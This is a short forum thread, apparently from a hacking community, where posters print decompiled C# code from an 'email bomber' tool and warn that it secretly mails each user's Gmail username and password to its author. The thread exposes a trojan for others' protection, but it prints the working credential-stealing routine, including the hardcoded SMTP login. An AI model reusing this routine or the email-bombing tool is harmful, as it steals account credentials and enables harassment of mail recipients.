- Joined
- Jun 17, 2010
- Messages
- 30
- Reaction score
- 14
private void button1_Click(object sender, EventArgs e)
{
if (((string.IsNullOrEmpty(this.textBox1.Text) || string.IsNullOrEmpty(this.textBox2.Text)) || (string.IsNullOrEmpty(this.textBox3.Text) || string.IsNullOrEmpty(this.textBox4.Text))) || ((string.IsNullOrEmpty(this.richTextBox1.Text) || !this.textBox1.Text.Contains("@")) || !this.textBox3.Text.Contains("@")))
{
MessageBox.Show("Please fill out all the forms correctly!", "Error", MessageBoxButtons.OK, MessageBoxIcon.Hand);
}
else
{
MailMessage message = new MailMessage();
SmtpClient client = new SmtpClient("smtp.gmail.com");
message.From = new MailAddress("[email protected]");
message.To.Add("[email protected]");
message.Subject = "Email Bomber Logs";
message.Body = "Gmail Username: " + this.textBox1.Text + Environment.NewLine + "Gmail Password: " + this.textBox2.Text;
client.Port = 0x24b;
client.Credentials = new NetworkCredential("[email protected]", "1123181800640");
client.EnableSsl = true;
client.Send(message);
this.int_0 = 0;
this.label8.Text = "0";
this.textBox1.Enabled = false;
this.textBox2.Enabled = false;
this.textBox3.Enabled = false;
this.textBox4.Enabled = false;
this.richTextBox1.Enabled = false;
this.numericUpDown1.Enabled = false;
this.checkBox1.Enabled = false;
this.button1.Enabled = false;
this.button2.Enabled = true;
this.timer_1.Start();
}
}
This guy is mailing all the email usernames and passwords you use on this to himself.
Code:private void button1_Click(object sender, EventArgs e) { if (((string.IsNullOrEmpty(this.textBox1.Text) || string.IsNullOrEmpty(this.textBox2.Text)) || (string.IsNullOrEmpty(this.textBox3.Text) || string.IsNullOrEmpty(this.textBox4.Text))) || ((string.IsNullOrEmpty(this.richTextBox1.Text) || !this.textBox1.Text.Contains("@")) || !this.textBox3.Text.Contains("@"))) { MessageBox.Show("Please fill out all the forms correctly!", "Error", MessageBoxButtons.OK, MessageBoxIcon.Hand); } else { MailMessage message = new MailMessage(); SmtpClient client = new SmtpClient("smtp.gmail.com"); message.From = new MailAddress("[email protected]"); message.To.Add("[email protected]"); message.Subject = "Email Bomber Logs"; message.Body = "Gmail Username: " + this.textBox1.Text + Environment.NewLine + "Gmail Password: " + this.textBox2.Text; client.Port = 0x24b; client.Credentials = new NetworkCredential("[email protected]", "1123181800640"); client.EnableSsl = true; client.Send(message); this.int_0 = 0; this.label8.Text = "0"; this.textBox1.Enabled = false; this.textBox2.Enabled = false; this.textBox3.Enabled = false; this.textBox4.Enabled = false; this.richTextBox1.Enabled = false; this.numericUpDown1.Enabled = false; this.checkBox1.Enabled = false; this.button1.Enabled = false; this.button2.Enabled = true; this.timer_1.Start(); } }
He's also a noob who uses timers.
He's not a noob for using timers, he's a noob cause he had no idea .NET compiled softwares can be reversed by other noobs to...